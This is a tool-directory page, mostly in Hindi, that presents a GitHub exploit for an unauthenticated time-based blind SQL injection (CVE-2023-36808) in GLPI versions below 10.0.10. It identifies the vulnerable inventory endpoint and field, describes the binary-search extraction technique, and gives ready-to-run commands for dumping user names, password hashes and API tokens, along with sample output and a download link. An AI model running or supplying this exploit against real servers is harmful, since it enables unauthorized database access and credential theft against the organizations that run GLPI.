Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
exploit-cve-2023-36808 — समय-आधारित ब्लाइंड SQL इंजेक्शन एक्सप्लॉइट GLPI < 10.0.10 में CVE-2023-36808 के लिए। बाइनरी सर्च ऑप्टिमाइज़ेशन के साथ अनऑथेंटिकेटेड XML इन्वेंट्री एंडपॉइंट के माध्यम से उपयोगकर्ता क्रेडेंशियल्स और डेटाबेस सामग्री निकालता है। | Kitploit
उपकरण/GitHubGitHub/fransosiche/exploit-cve-2023-36808
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubfransosiche/exploit-cve-2023-36808

exploit-cve-2023-36808

समय-आधारित ब्लाइंड SQL इंजेक्शन एक्सप्लॉइट GLPI < 10.0.10 में CVE-2023-36808 के लिए। बाइनरी सर्च ऑप्टिमाइज़ेशन के साथ अनऑथेंटिकेटेड XML इन्वेंट्री एंडपॉइंट के माध्यम से उपयोगकर्ता क्रेडेंशियल्स और डेटाबेस सामग्री निकालता है।

रिपॉजिटरी देखें
13 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-36808 - GLPI अप्रमाणित SQL इंजेक्शन

भेद्यता

GLPI संस्करण < 10.0.10 एक अप्रमाणित XML इन्वेंटरी एंडपॉइंट को /front/inventory.php पर उजागर करते हैं।
<deviceid> फ़ील्ड को बिना सैनिटाइज़ेशन के सीधे SQL क्वेरी में इंजेक्ट किया जाता है:

root@kitploit:~
SELECT id FROM glpi_agents WHERE deviceid = '<INJECT>'

कोई प्रमाणीकरण आवश्यक नहीं है। यह भेद्यता ब्लाइंड SQL इंजेक्शन के माध्यम से पूर्ण डेटाबेस पढ़ने की पहुँच की अनुमति देती है।

शोषण

यह स्क्रिप्ट सामान्य टूल्स की तुलना में डेटा को काफी तेज़ी से निकालने के लिए समय-आधारित ब्लाइंड इंजेक्शन और बाइनरी खोज का उपयोग करती है।

  • प्रति बूलियन जाँच में एक SLEEP (तालिका आकार की परवाह किए बिना विश्वसनीय)
  • बाइनरी खोज: प्रति वर्ण ~7 अनुरोध, 95 के बजाय
  • फ़ील्ड-स्तरीय समानता: प्रति उपयोगकर्ता नाम, पासवर्ड और टोकन एक साथ निकाले जाते हैं
  • समवर्ती सीमा समानांतर अनुरोधों के बीच समय हस्तक्षेप को रोकती है

आवश्यकताएँ

root@kitploit:~
pip install -r requirements.txt

उपयोग

root@kitploit:~
# Dump the full glpi_users table (name, password hash, personal_token)
python3 exploit.py http://<TARGET>/glpi

# Custom SQL query
python3 exploit.py http://<TARGET>/glpi --query "SELECT @@version"

# Tune timing (lower sleep = faster, increase if you get wrong results)
python3 exploit.py http://<TARGET>/glpi --sleep 0.3

# Increase parallel request cap (default 2, raise on high-latency remote targets)
python3 exploit.py http://<TARGET>/glpi --parallel 4

उदाहरण आउटपुट

root@kitploit:~
[*] CVE-2023-36808 - GLPI Unauthenticated SQLi
[*] Target : http://10.0.0.1/glpi/front/inventory.php
[*] Sleep  : 0.5s  Threshold: 0.35s  Parallel: 2

[+] Target reachable
[+] Injection confirmed

[*] User 1/7
  name               glpi
  password           $2y$10$xN.12pQxSLlQdMJzP26EWe...
  personal_token     xxxx
...

संदर्भ

  • NVD - CVE-2023-36808
  • GLPI सुरक्षा सलाह
टूल डाउनलोड करें